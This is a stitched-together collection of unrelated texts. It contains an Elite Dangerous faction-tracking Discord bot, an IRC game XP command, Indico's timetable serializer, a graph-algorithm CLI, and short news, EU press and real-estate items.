faction_data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/factions',
{'name': faction_name}, 'object')
for faction in faction_data.docs:
if str(faction.id) not in self.faction_cache:
self.faction_cache[str(faction.id)] = faction.name
insert_faction = "INSERT INTO faction VALUES ($1, $2, $3, $4, $5, $6) ON CONFLICT DO NOTHING "
if faction.home_system_id is not None:
if str(faction.home_system_id) in self.system_cache:
system_name = self.system_cache[str(faction.home_system_id)]
else:
faction_data = await Web.get_response(
'https://eddbapi.kodeblox.com/api/v4/populatedsystems',
{'eddbid': faction.home_system_id}, 'object')
system_name = faction_data.docs[0].name
self.system_cache[str(faction.home_system_id)] = system_name
else:
system_name = ""
faction_values = (
faction.id,
faction.name,
faction.is_player_faction,
system_name,
faction.allegiance,
faction.government
)
faction_id = faction.id
await db.execute(insert_faction, *faction_values)
else:
faction_id = faction_result['id']
await database.Database.close_connection(db)
return faction_id
async def set_tick_date(self, date):
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
if self.last_tick is None or self.last_tick < date:
insert_tick = "INSERT INTO tick(time) values($1) ON CONFLICT DO NOTHING"
await db.execute(insert_tick, date)
self.updated_systems = set()
self.war_cache = {}
self.faction_data = {
75253: Faction(75253, "Colonists of Aurora", "https://inara.cz/minorfaction/44432/"),
23831: Faction(23831, "Prismatic Imperium", "https://inara.cz/minorfaction/25441/"),
74847: Faction(74847, "Adamantine Union", "https://inara.cz/minorfaction/35809/")
}
self.last_tick = date
tick_select = "SELECT id as tick_id, time FROM tick ORDER BY time DESC LIMIT 1"
self.tick_id = (await db.fetchrow(tick_select))['tick_id']
channel = self.bot.get_channel(BGS_CHANNEL)
# await self.recheck_systems() FIXME - EDDN API is currently not updating
self.faction_data[75253].message = await self.setup_bgs_message(channel, 75253) # Colonists of Aurora
self.faction_data[23831].message = await self.setup_bgs_message(channel, 23831) # Prismatic Imperium
self.faction_data[74847].message = await self.setup_bgs_message(channel, 74847) # Adamantine Union
update_faction = "UPDATE faction SET message_id = $1 WHERE id = $2"
await db.execute(update_faction, *(self.faction_data[75253].message, 75253))
await db.execute(update_faction, *(self.faction_data[23831].message, 23831))
await db.execute(update_faction, *(self.faction_data[74847].message, 74847))
await database.Database.close_connection(db)
async def setup_bgs_message(self, channel, faction_id):
embed = discord.Embed(colour=discord.Colour(0x992d22), url=self.faction_data[faction_id].link, title=self.faction_data[faction_id].name.upper())
embed.set_author(name="Tick at {:%d %b %Y %H:%M}".format(self.last_tick))
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
system_select = "select id as system_id, name from star_system where our_faction_id = $1 order by name"
system_count = 0
systems = []
async for (system_id, name) in db.cursor(system_select, faction_id):
system_count = system_count + 1
systems.append(name)
self.faction_data[faction_id].systems = system_count
# progress field
embed.add_field(name="Tour progress", value="0/{} - 0%".format(system_count), inline=False)
# missing stations
if len(systems) > 0:
missing_systems = ", ".join(systems)
else:
missing_systems = "Tour completed"
embed.add_field(name="Missing systems", value="{}".format(missing_systems), inline=False)
# states
embed.add_field(name="Active states", value="None", inline=False)
embed.add_field(name="Pending states", value="None")
embed.add_field(name="Recovering states", value="None")
# expansion warning
embed.add_field(name="Expansion warning", value="None")
# low inf warning
embed.add_field(name="Inf getting low", value="None")
# conflict warning
embed.add_field(name="Inf too low", value="None")
# Not controll system warning
embed.add_field(name="Not in control", value="None")
await database.Database.close_connection(db)
message = await channel.send(embed=embed)
# await message.pin()
return message.id
async def recheck_systems(self):
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
system_select = "SELECT id as system_id, our_faction_id FROM star_system WHERE our_faction_id > 0"
async for (system_id, our_faction_id) in db.cursor(system_select):
system_data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/populatedsystems',
{'eddbid': system_id}, 'object')
present = False
for system in system_data.docs:
for faction in system.minor_faction_presences:
if faction.minor_faction_id == our_faction_id:
present = True
if not present:
remove_query = "DELETE FROM star_system WHERE id = $1"
await db.execute(remove_query, system_id)
await database.Database.close_connection(db)
async def init_bgs(self):
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
tick_select = "SELECT id as tick_id, time FROM tick ORDER BY time DESC LIMIT 1"
tick_id, time = await db.fetchrow(tick_select)
self.tick_id = tick_id
self.last_tick = time
messages_select = "SELECT id as faction_id, message_id FROM faction where id in (74847, 23831, 75253)"
async for (faction_id, message_id) in db.cursor(messages_select):
system_select = "select count(*) as system_count from star_system where our_faction_id = $1"
async for record in db.cursor(system_select, faction_id):
self.faction_data[faction_id].systems = record['system_count']
self.faction_data[faction_id].message = message_id
states_select = "select star_system.name, influence.system, influence.influence, influence.states, pending, recovering from influence join star_system on star_system.id = influence.system where tick = $1 and faction = $2"
async for (name, system_id, influence, states, pending, recovering) in db.cursor(states_select, *(tick_id, faction_id)):
self.updated_systems.add(name)
self.faction_data[faction_id].set_active(states)
self.faction_data[faction_id].set_pending(pending)
self.faction_data[faction_id].set_recovering(recovering)
influence_select = "select faction, influence.influence from influence where influence.system = $1 and tick = $2 order by influence desc limit 2"
their_influence = 0
async for (inf_faction_id, faction_influence) in db.cursor(influence_select, *(system_id, tick_id)):
if not inf_faction_id == faction_id:
if faction_influence > their_influence:
their_influence = faction_influence
if influence > 65.00:
self.faction_data[faction_id].expansion_warning.append("{} {}%".format(name, round(influence, 2)))
else:
difference = influence - their_influence
if 10.00 < difference <= 20.00:
self.faction_data[faction_id].mild_warning.append(
"{} {}% ({})".format(name, round(influence, 2), round(difference, 2)))
elif difference < 0.00:
self.faction_data[faction_id].not_control.append(
"{} {}% ({})".format(name, round(influence, 2), round(difference, 2)))
elif difference <= 10.00:
self.faction_data[faction_id].high_warning.append(
"{} {}% ({})".format(name, round(influence, 2), round(difference, 2)))
await self.update_message(faction_id)
await database.Database.close_connection(db)
async def update_message(self, faction_id, conflict_data=None):
faction = self.faction_data[faction_id]
channel = self.bot.get_channel(BGS_CHANNEL)
message = await channel.fetch_message(faction.message)
embed = message.embeds[0]
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
system_select = "select star_system.id as system_id, name from star_system" \
" left join influence on star_system.id = influence.system and tick = $1 " \
"where our_faction_id = $2 and influence.influence is null order by name;"
missing_count = 0
missing_systems = []
async for (system_id, name) in db.cursor(system_select, *(self.tick_id, faction_id)):
missing_count = missing_count + 1
missing_systems.append(name)
done_count = faction.systems - missing_count
percentage = 100 * done_count / faction.systems
embed.set_field_at(0, name="Tour progress", value="{}/{} - {}%".format(done_count, faction.systems, round(percentage)), inline=False)
if len(missing_systems) > 0:
systems = ", ".join(missing_systems)
else:
systems = "Tour completed"
embed.set_field_at(1, name="Missing systems", value="{}".format(systems), inline=False)
embed.set_field_at(2, name="Active states", value="{}".format(faction.active), inline=False)
embed.set_field_at(3, name="Pending states", value="{}".format(faction.pending))
embed.set_field_at(4, name="Recovering states", value="{}".format(faction.recovering))
if len(faction.expansion_warning) > 0:
expansion_warning = "\n".join(faction.expansion_warning)
else:
expansion_warning = "None"
if len(faction.mild_warning) > 0:
mild_warning = "\n".join(faction.mild_warning)
else:
mild_warning = "None"
if len(faction.high_warning) > 0:
high_warning = "\n".join(faction.high_warning)
else:
high_warning = "None"
if len(faction.not_control) > 0:
not_control = "\n".join(faction.not_control)
else:
not_control = "None"
embed.set_field_at(5, name="Expansion warning", value="{}".format(expansion_warning))
embed.set_field_at(6, name="Inf getting low", value="{}".format(mild_warning))
embed.set_field_at(7, name="Inf too low", value="{}".format(high_warning))
embed.set_field_at(8, name="Not in control", value="{}".format(not_control))
if conflict_data is not None:
name, value = conflict_data
embed.add_field(name=name, value=value)
await message.edit(embed=embed)
await database.Database.close_connection(db)
async def submit(self, data):
db = await database.Database.get_connection(self.bot.loop)
influences = []
our_influence = 0
our_id = 0
skip = False
conflict_data = None
async with db.transaction():
timestamp = isoparse(data.timestamp)
# if timestamp > self.last_tick and data.StarSystem not in self.updated_systems:
if timestamp > self.last_tick:
if data.StarSystem not in self.updated_systems:
self.updated_systems.add(data.StarSystem)
system_id = await self._get_system_id(data.StarSystem)
for faction in data.Factions:
faction_id = await self._get_faction_id(faction.Name)
states = ""
pending = ""
recovering = ""
try:
for state in faction.ActiveStates:
if len(states) > 0:
states = states + '|'
states = states + state.State
except AttributeError as e:
states = faction.FactionState
try:
for state in faction.RecoveringStates:
if len(recovering) > 0:
recovering = recovering + '|'
recovering = recovering + state.State
except AttributeError as e:
recovering = ''
try:
for state in faction.PendingStates:
if len(pending) > 0:
pending = pending + '|'
pending = pending + state.State
except AttributeError as e:
pending = ''
insert_influence = "INSERT INTO influence(faction, system, influence, tick, states, pending, recovering) VALUES($1, $2, $3, $4, $5, $6, $7) ON CONFLICT DO NOTHING"
influence_values = (
faction_id,
system_id,
faction.Influence * 100,
self.tick_id,
states,
pending,
recovering
)
if faction_id in (75253, 23831, 74847):
our_faction = self.faction_data[faction_id]
our_influence = faction.Influence * 100
our_id = faction_id
our_faction.set_recovering(recovering)
our_faction.set_active(states)
our_faction.set_pending(pending)
influences.append(faction.Influence * 100)
await db.execute(insert_influence, *influence_values)
update_system = "UPDATE star_system SET our_faction_id = $1 WHERE id = $2"
await db.execute(update_system, *(our_id, system_id))
try:
for conflict in data.Conflicts:
faction1 = await self._get_faction_id(conflict.Faction1.Name)
faction2 = await self._get_faction_id(conflict.Faction2.Name)
if faction1 in (75253, 23831, 74847) or faction2 in (75253, 23831, 74847):
war_type = conflict.WarType.capitalize()
score1 = conflict.Faction1.WonDays
score2 = conflict.Faction2.WonDays
                                if war_type == "Civilwar":
war_type = "Civil war"
if data.StarSystem not in self.war_cache or self.war_cache[data.StarSystem] != score1 + score2:
self.war_cache[data.StarSystem] = score1 + score2
if faction1 in (75253, 23831, 74847):
conflict_data = ("{} in {}".format(war_type, data.StarSystem), "{} - {}".format(score1, score2))
else:
conflict_data = ("{} in {}".format(war_type, data.StarSystem), "{} - {}".format(score2, score1))
except AttributeError as e:
conflict_data = None
else:
skip = True
if not skip:
print(data.StarSystem + " recorded")
influences.sort(reverse=True)
if data.StarSystem in self.updated_systems:
for item in our_faction.expansion_warning:
if data.StarSystem in item:
our_faction.expansion_warning.remove(item)
for item in our_faction.mild_warning:
if data.StarSystem in item:
our_faction.mild_warning.remove(item)
for item in our_faction.not_control:
if data.StarSystem in item:
our_faction.not_control.remove(item)
for item in our_faction.high_warning:
if data.StarSystem in item:
our_faction.high_warning.remove(item)
if our_influence > 65.00:
our_faction.expansion_warning.append("{} {}%".format(data.StarSystem, round(our_influence, 2)))
else:
if our_influence == influences[0]:
difference = our_influence - influences[1]
else:
difference = our_influence - influences[0]
if 10.00 < difference <= 20.00:
our_faction.mild_warning.append(
"{} {}% ({})".format(data.StarSystem, round(our_influence, 2), round(difference, 2)))
elif difference < 0.00:
our_faction.not_control.append(
"{} {}% ({})".format(data.StarSystem, round(our_influence, 2), round(difference, 2)))
elif difference <= 10.00:
our_faction.high_warning.append(
"{} {}% ({})".format(data.StarSystem, round(our_influence, 2), round(difference, 2)))
await self.update_message(our_id, conflict_data)
await database.Database.close_connection(db)
def setup(bot):
bot.add_cog(BGS(bot))
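# Minimal loading sketch (the module path ``cogs.bgs`` and TOKEN are
# hypothetical; discord.py calls the ``setup`` function above on load):
#
#   bot = commands.Bot(command_prefix='!')
#   bot.load_extension('cogs.bgs')
#   bot.run(TOKEN)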
|
New figures from the Home Office show that 1,293 house fires were started by a household appliance in the area between April 2012 and March last year.
More than half of the incidents attended by the West Sussex Fire and Rescue Service were started by cookers, with 767 fires causing 147 deaths or injuries over the five-year period.
Between April 2012 and March 2017, 247 fires started by domestic appliances caused deaths or injuries.
Over 110 fires were started by faulty appliances or leads in West Sussex over the five years. Across England, such faults started over 13,000 fires.
The most common reason for fires started by appliances was misuse of the equipment, which caused 863 fires in West Sussex, and nearly 48,000 nationally.
But chip pans, the old staple of fire safety talks, were still the cause of 132 fires in West Sussex, and over 9,000 fires nationally. |
"""
Loadable.Loadable subclass
"""
# This file is part of Munin.
# Munin is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# Munin is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Munin; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
# This work is Copyright (C)2006 by Andreas Jacobsen
# Individual portions may be copyright by individual contributors, and
# are included in this collective work with permission of the copyright
# owners.
# Nothing hardcoded found here.
# qebab, 24/6/08.
import re
from munin import loadable
class xp(loadable.loadable):
def __init__(self, cursor):
super().__init__(cursor, 1)
self.paramre = re.compile(
r"^\s*(\d+)[.-:\s](\d+)[.-:\s](\d+)(?:\s+(\d+)[.-:\s](\d+)[.-:\s](\d+))?(?:\s+(\d+))?"
)
self.usage = (
self.__class__.__name__ + " <defender coords> [attacker coords] [MCs]"
)
def execute(self, user, access, irc_msg):
m = self.paramre.search(irc_msg.command_parameters)
if not m:
irc_msg.reply("Usage: %s" % (self.usage,))
return 0
if access < self.level:
irc_msg.reply("You do not have enough access to use this command")
return 0
victim = None
attacker = None
mcs = 0
victim = loadable.planet(x=m.group(1), y=m.group(2), z=m.group(3))
if not victim.load_most_recent(self.cursor, irc_msg.round):
irc_msg.reply(
"%s:%s:%s is not a valid planet" % (victim.x, victim.y, victim.z)
)
return 1
if not victim:
irc_msg.reply("Usage: %s" % (self.usage,))
return 1
if m.lastindex >= 6 and m.group(4) and m.group(5) and m.group(6):
attacker = loadable.planet(x=m.group(4), y=m.group(5), z=m.group(6))
if not attacker.load_most_recent(self.cursor, irc_msg.round):
irc_msg.reply(
"%s:%s:%s is not a valid planet"
% (attacker.x, attacker.y, attacker.z)
)
return 1
if not attacker:
u = loadable.user(pnick=irc_msg.user)
u.load_from_db(self.cursor, irc_msg.round)
if not u.planet:
irc_msg.reply(
"You must be registered to use the automatic %s command (log in with P and "
"set mode +x, then make sure your planet is set with the pref command (!pref planet=x:y:z))"
% (self.__class__.__name__)
)
return 1
attacker = u.planet
if m.lastindex == 7:
mcs = int(m.group(7))
reply = "Target %s:%s:%s (%s|%s) " % (
victim.x,
victim.y,
victim.z,
self.format_real_value(victim.value),
self.format_real_value(victim.score),
)
reply += "| Attacker %s:%s:%s (%s|%s) " % (
attacker.x,
attacker.y,
attacker.z,
self.format_real_value(attacker.value),
self.format_real_value(attacker.score),
)
bravery = attacker.bravery(victim)
cap = int(attacker.cap_rate(victim) * victim.size)
min_xp, max_xp = attacker.calc_xp(victim, mcs)
min_score = self.format_real_value(60 * min_xp)
max_score = self.format_real_value(60 * max_xp)
reply += "| Bravery: %.2f | Cap: %d | MCs: %d | XP: %d-%d | Score: %s-%s" % (
bravery,
cap,
mcs,
min_xp,
max_xp,
min_score,
max_score
)
irc_msg.reply(reply)
return 1
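# Example parameter strings accepted by ``paramre`` above (coordinates are
# illustrative; separators may be '.', '-', ':' or whitespace):
#
#   xp 1:2:3            -> XP for hitting defender 1:2:3 from your saved planet
#   xp 1:2:3 4:5:6      -> XP for attacker 4:5:6 hitting defender 1:2:3
#   xp 1:2:3 4:5:6 10   -> as above, assuming 10 MCs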
|
EU - The European Commission welcomes the European Parliament's approval of a draft Directive that will simplify and facilitate the administrative procedures for ships entering and leaving European ports.
The provisions of the Directive will be phased in between 2012 and 2015. This Directive will contribute to making maritime transport more attractive and supporting maritime activity, particularly in small and medium-sized commercial ports.
Siim Kallas, Commission Vice-President responsible for transport, said: "The simplification of administrative procedures for maritime transport is an important step, not only because it will reduce the costs of maritime transport, which is used to deliver almost 40 per cent of goods within the Internal Market, but also because maritime transport is a cleaner and safer form of transport".
This agreement gives the Member States, industries and port authorities five years to set up a one-stop administrative shop in every port. From 2013, the Directive will also simplify and harmonise a certain number of procedures, notably reducing the repeated transmission of data to the different administrative authorities in the ports.
While the administrative formalities for other modes of transport have been considerably streamlined since the creation of the single market, maritime transport remains subject to complex procedures. Under customs regulations and international law, a ship is considered to leave a Member State's territory once it crosses the territorial water limit of 12 nautical miles (22 km). A vessel sailing from one European Union port to another has to go through administrative formalities on both departure and arrival in the same way as international shipping.
After the adoption of guidelines for veterinary checks in December 2009 and the amendment of the implementing rules for the Customs Code in March 2010, the Directive adopted today completes the first instalment of short-term actions planned as part of the European maritime transport area without borders initiative launched in 2009.
It is also a new step towards establishing a framework that will allow a more integrated management of the flow of administrative and commercial information accompanying the movement of goods into, out of and within the European Union, which will facilitate the work of both the operators and the inspection authorities. In the area of maritime transport, this framework will be completed by the European e-Maritime initiative, which the Commission is working on in cooperation with the stakeholders and which will be the subject of a proposal in 2011. |
# This file is part of Indico.
# Copyright (C) 2002 - 2017 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from collections import defaultdict
from hashlib import md5
from itertools import chain
from flask import has_request_context, session
from sqlalchemy.orm import defaultload
from indico.modules.events.contributions.models.persons import AuthorType
from indico.modules.events.models.events import EventType
from indico.modules.events.timetable.models.entries import TimetableEntry, TimetableEntryType
from indico.util.date_time import iterdays
from indico.web.flask.util import url_for
class TimetableSerializer(object):
def __init__(self, event, management=False, user=None):
self.management = management
self.user = user if user is not None or not has_request_context() else session.user
self.event = event
self.can_manage_event = self.event.can_manage(self.user)
def serialize_timetable(self, days=None, hide_weekends=False, strip_empty_days=False):
tzinfo = self.event.tzinfo if self.management else self.event.display_tzinfo
self.event.preload_all_acl_entries()
timetable = {}
for day in iterdays(self.event.start_dt.astimezone(tzinfo), self.event.end_dt.astimezone(tzinfo),
skip_weekends=hide_weekends, day_whitelist=days):
date_str = day.strftime('%Y%m%d')
timetable[date_str] = {}
contributions_strategy = defaultload('contribution')
contributions_strategy.subqueryload('person_links')
contributions_strategy.subqueryload('references')
query_options = (contributions_strategy,
defaultload('session_block').subqueryload('person_links'))
query = (TimetableEntry.query.with_parent(self.event)
.options(*query_options)
.order_by(TimetableEntry.type != TimetableEntryType.SESSION_BLOCK))
for entry in query:
day = entry.start_dt.astimezone(tzinfo).date()
date_str = day.strftime('%Y%m%d')
if date_str not in timetable:
continue
if not entry.can_view(self.user):
continue
data = self.serialize_timetable_entry(entry, load_children=False)
key = self._get_entry_key(entry)
if entry.parent:
parent_code = 's{}'.format(entry.parent_id)
timetable[date_str][parent_code]['entries'][key] = data
else:
if (entry.type == TimetableEntryType.SESSION_BLOCK and
entry.start_dt.astimezone(tzinfo).date() != entry.end_dt.astimezone(tzinfo).date()):
# If a session block lasts into another day we need to add it to that day, too
timetable[entry.end_dt.astimezone(tzinfo).date().strftime('%Y%m%d')][key] = data
timetable[date_str][key] = data
if strip_empty_days:
timetable = self._strip_empty_days(timetable)
return timetable
def serialize_session_timetable(self, session_, without_blocks=False, strip_empty_days=False):
event_tz = self.event.tzinfo
timetable = {}
if session_.blocks:
start_dt = min(chain((b.start_dt for b in session_.blocks), (self.event.start_dt,))).astimezone(event_tz)
end_dt = max(chain((b.end_dt for b in session_.blocks), (self.event.end_dt,))).astimezone(event_tz)
else:
start_dt = self.event.start_dt_local
end_dt = self.event.end_dt_local
for day in iterdays(start_dt, end_dt):
timetable[day.strftime('%Y%m%d')] = {}
for block in session_.blocks:
block_entry = block.timetable_entry
if not block_entry:
continue
date_key = block_entry.start_dt.astimezone(event_tz).strftime('%Y%m%d')
entries = block_entry.children if without_blocks else [block_entry]
for entry in entries:
if not entry.can_view(self.user):
continue
entry_key = self._get_entry_key(entry)
timetable[date_key][entry_key] = self.serialize_timetable_entry(entry, load_children=True)
if strip_empty_days:
timetable = self._strip_empty_days(timetable)
return timetable
@staticmethod
def _strip_empty_days(timetable):
"""Return the timetable without the leading and trailing empty days."""
days = sorted(timetable)
first_non_empty = next((day for day in days if timetable[day]), None)
if first_non_empty is None:
return {}
last_non_empty = next((day for day in reversed(days) if timetable[day]), first_non_empty)
return {day: timetable[day] for day in days if first_non_empty <= day <= last_non_empty}
def serialize_timetable_entry(self, entry, **kwargs):
if entry.type == TimetableEntryType.SESSION_BLOCK:
return self.serialize_session_block_entry(entry, kwargs.pop('load_children', True))
elif entry.type == TimetableEntryType.CONTRIBUTION:
return self.serialize_contribution_entry(entry)
elif entry.type == TimetableEntryType.BREAK:
return self.serialize_break_entry(entry)
else:
raise TypeError("Unknown timetable entry type.")
def serialize_session_block_entry(self, entry, load_children=True):
block = entry.session_block
data = {}
if not load_children:
entries = defaultdict(dict)
else:
entries = {self._get_entry_key(x): self.serialize_timetable_entry(x) for x in entry.children}
data.update(self._get_entry_data(entry))
data.update(self._get_color_data(block.session))
data.update(self._get_location_data(block))
data.update({'entryType': 'Session',
'sessionSlotId': block.id,
'sessionId': block.session_id,
'sessionCode': block.session.code,
'title': block.session.title,
'slotTitle': block.title,
'attachments': self._get_attachment_data(block.session),
'code': block.session.code,
'contribDuration': block.session.default_contribution_duration.seconds / 60,
'conveners': [self._get_person_data(x) for x in block.person_links],
'description': block.session.description,
'duration': block.duration.seconds / 60,
'isPoster': block.session.is_poster,
'entries': entries,
'pdf': url_for('sessions.export_session_timetable', block.session),
'url': url_for('sessions.display_session', block.session),
'friendlyId': block.session.friendly_id})
return data
def serialize_contribution_entry(self, entry):
from indico.modules.events.api import SerializerBase
block = entry.parent.session_block if entry.parent else None
contribution = entry.contribution
data = {}
data.update(self._get_entry_data(entry))
if contribution.session:
data.update(self._get_color_data(contribution.session))
data.update(self._get_location_data(contribution))
data.update({'entryType': 'Contribution',
'_type': 'ContribSchEntry',
'_fossil': 'contribSchEntryDisplay',
'contributionId': contribution.id,
'attachments': self._get_attachment_data(contribution),
'description': contribution.description,
'duration': contribution.duration.seconds / 60,
'pdf': url_for('contributions.export_pdf', entry.contribution),
'presenters': map(self._get_person_data,
sorted([p for p in contribution.person_links if p.is_speaker],
key=lambda x: (x.author_type != AuthorType.primary,
x.author_type != AuthorType.secondary,
x.display_order_key))),
'sessionCode': block.session.code if block else None,
'sessionId': block.session_id if block else None,
'sessionSlotId': block.id if block else None,
'sessionSlotEntryId': entry.parent.id if entry.parent else None,
'title': contribution.title,
'url': url_for('contributions.display_contribution', contribution),
'friendlyId': contribution.friendly_id,
'references': map(SerializerBase.serialize_reference, contribution.references),
'board_number': contribution.board_number})
return data
def serialize_break_entry(self, entry, management=False):
block = entry.parent.session_block if entry.parent else None
break_ = entry.break_
data = {}
data.update(self._get_entry_data(entry))
data.update(self._get_color_data(break_))
data.update(self._get_location_data(break_))
data.update({'entryType': 'Break',
'_type': 'BreakTimeSchEntry',
'_fossil': 'breakTimeSchEntry',
'description': break_.description,
'duration': break_.duration.seconds / 60,
'sessionId': block.session_id if block else None,
'sessionCode': block.session.code if block else None,
'sessionSlotId': block.id if block else None,
'sessionSlotEntryId': entry.parent.id if entry.parent else None,
'title': break_.title})
return data
def _get_attachment_data(self, obj):
def serialize_attachment(attachment):
return {'id': attachment.id,
'_type': 'Attachment',
'_fossil': 'attachment',
'title': attachment.title,
'download_url': attachment.download_url}
def serialize_folder(folder):
return {'id': folder.id,
'_type': 'AttachmentFolder',
'_fossil': 'folder',
'title': folder.title,
'attachments': map(serialize_attachment, folder.attachments)}
data = {'files': [], 'folders': []}
items = obj.attached_items
data['files'] = map(serialize_attachment, items.get('files', []))
data['folders'] = map(serialize_folder, items.get('folders', []))
if not data['files'] and not data['folders']:
data['files'] = None
return data
def _get_color_data(self, obj):
return {'color': '#' + obj.background_color,
'textColor': '#' + obj.text_color}
def _get_date_data(self, entry):
if self.management:
tzinfo = entry.event.tzinfo
else:
tzinfo = entry.event.display_tzinfo
return {'startDate': self._get_entry_date_dt(entry.start_dt, tzinfo),
'endDate': self._get_entry_date_dt(entry.end_dt, tzinfo)}
def _get_entry_data(self, entry):
from indico.modules.events.timetable.operations import can_swap_entry
data = {}
data.update(self._get_date_data(entry))
data['id'] = self._get_entry_key(entry)
data['uniqueId'] = data['id']
data['conferenceId'] = entry.event_id
if self.management:
data['isParallel'] = entry.is_parallel()
data['isParallelInSession'] = entry.is_parallel(in_session=True)
data['scheduleEntryId'] = entry.id
data['canSwapUp'] = can_swap_entry(entry, direction='up')
data['canSwapDown'] = can_swap_entry(entry, direction='down')
return data
def _get_entry_key(self, entry):
if entry.type == TimetableEntryType.SESSION_BLOCK:
return 's{}'.format(entry.id)
elif entry.type == TimetableEntryType.CONTRIBUTION:
return 'c{}'.format(entry.id)
elif entry.type == TimetableEntryType.BREAK:
return 'b{}'.format(entry.id)
else:
            raise ValueError("Unknown timetable entry type.")
def _get_entry_date_dt(self, dt, tzinfo):
return {'date': dt.astimezone(tzinfo).strftime('%Y-%m-%d'),
'time': dt.astimezone(tzinfo).strftime('%H:%M:%S'),
'tz': str(tzinfo)}
def _get_location_data(self, obj):
data = {}
data['location'] = obj.venue_name
data['room'] = obj.room_name
data['inheritLoc'] = obj.inherit_location
data['inheritRoom'] = obj.inherit_location
if self.management:
data['address'] = obj.address
return data
def _get_person_data(self, person_link):
person = person_link.person
data = {'firstName': person_link.first_name,
'familyName': person_link.last_name,
'affiliation': person_link.affiliation,
'emailHash': md5(person.email.encode('utf-8')).hexdigest() if person.email else None,
'name': person_link.get_full_name(last_name_first=False, last_name_upper=False,
abbrev_first_name=False, show_title=True),
'displayOrderKey': person_link.display_order_key}
if self.can_manage_event:
data['email'] = person.email
return data
def serialize_contribution(contribution):
return {'id': contribution.id,
'friendly_id': contribution.friendly_id,
'title': contribution.title}
def serialize_day_update(event, day, block=None, session_=None):
serializer = TimetableSerializer(event, management=True)
timetable = serializer.serialize_session_timetable(session_) if session_ else serializer.serialize_timetable()
block_id = serializer._get_entry_key(block) if block else None
day = day.strftime('%Y%m%d')
return {'day': day,
'entries': timetable[day] if not block else timetable[day][block_id]['entries'],
'slotEntry': serializer.serialize_session_block_entry(block) if block else None}
def serialize_entry_update(entry, session_=None):
serializer = TimetableSerializer(entry.event, management=True)
day = entry.start_dt.astimezone(entry.event.tzinfo)
day_update = serialize_day_update(entry.event, day, block=entry.parent, session_=session_)
return dict({'id': serializer._get_entry_key(entry),
'entry': serializer.serialize_timetable_entry(entry),
'autoOps': None},
**day_update)
def serialize_event_info(event):
return {'_type': 'Conference',
'id': unicode(event.id),
'title': event.title,
'startDate': event.start_dt_local,
'endDate': event.end_dt_local,
'isConference': event.type_ == EventType.conference,
'sessions': {sess.id: serialize_session(sess) for sess in event.sessions}}
def serialize_session(sess):
"""Return data for a single session"""
data = {
'_type': 'Session',
'address': sess.address,
'color': '#' + sess.colors.background,
'description': sess.description,
'id': sess.id,
'isPoster': sess.is_poster,
'location': sess.venue_name,
'room': sess.room_name,
'roomFullname': sess.room_name,
'textColor': '#' + sess.colors.text,
'title': sess.title,
'url': url_for('sessions.display_session', sess)
}
return data
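# Minimal usage sketch (the ``event`` instance is hypothetical, e.g. obtained
# from Indico's ORM; result keys are illustrative):
#
#   serializer = TimetableSerializer(event, management=True)
#   timetable = serializer.serialize_timetable(strip_empty_days=True)
#   # -> {'20170601': {'s12': {'entries': {...}, ...}, 'c34': {...}}, ...}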
|
Looking for a new home in North East Park Hill? It is a great time to buy real estate in North East Park Hill and our site is a great place to begin your search. You can check out North East Park Hill schools, market statistics, the latest listings and more. Whether you are a first-time home buyer or you are already familiar with the home buying process, you can be assured that you have the best tools and the perfect agent available to help with your North East Park Hill home search.
There is currently 1 income property for sale in North East Park Hill. The average price for North East Park Hill properties is $445,000, which is 48% lower than all income properties within a 20-mile radius. The highest priced property in North East Park Hill is $445,000, while the lowest priced income property is listed at $445,000. Most of the properties available in North East Park Hill are income properties. Compared to last month, the average price of real estate in the area has gone up 100%. |
# -*- coding: utf-8 -*-
"""Main program for Command Line interface
Usage:
graph_algo -h
graph_algo --version
graph_algo p1hw4 [-v] -i <file>
  graph_algo p2hw4 [--algo <algo>] [-v] -i <file>...
graph_algo p2hw6 [-v] -i <file>...
Options:
-h --help show this help message and exit
--version show version and exit
-v --verbose print status messages
-i, --input <file>... input file(s)
  --algo <algo>        choose one algorithm
"""
from __future__ import unicode_literals, print_function
from docopt import docopt
from .graph import Graph
__version__ = "0.1.0"
__author__ = "Adason"
__license__ = "MIT"
def main():
"""Main entry point for the graph_algo CLI.
"""
args = docopt(__doc__, version=__version__)
# print(args)
if args["p1hw4"]:
g = Graph.read_input_part1_hw4(args["--input"][0])
sizes = []
for scc in g.kosaraju_sccs():
sizes.append(len(scc))
print(sorted(sizes, reverse=True))
elif args["p2hw4"]:
min_dists = []
for fn in args["--input"]:
g = Graph.read_input_part2_hw4(fn)
dist_pairs = g.floyd_warshall_apsp()
if dist_pairs:
min_dists.extend(dist_pairs.values())
if len(min_dists) > 0:
print(min(min_dists))
else:
print("NULL")
elif args["p2hw6"]:
for fn in args["--input"]:
g = Graph.read_input_part2_hw6(fn)
sol_status = 1
for scc in g.kosaraju_sccs():
scc_vids = set(scc)
for vid in scc:
if str(-int(vid)) in scc_vids:
sol_status = 0
break
if sol_status == 0:
break
print(sol_status, end="")
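# Example shell invocations (input file names are illustrative):
#
#   graph_algo p1hw4 -i scc_graph.txt          # SCC sizes, largest first
#   graph_algo p2hw4 -i g1.txt g2.txt g3.txt   # smallest shortest-path distance
#   graph_algo p2hw6 -i 2sat1.txt 2sat2.txt    # prints 1/0 per 2-SAT instance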
|
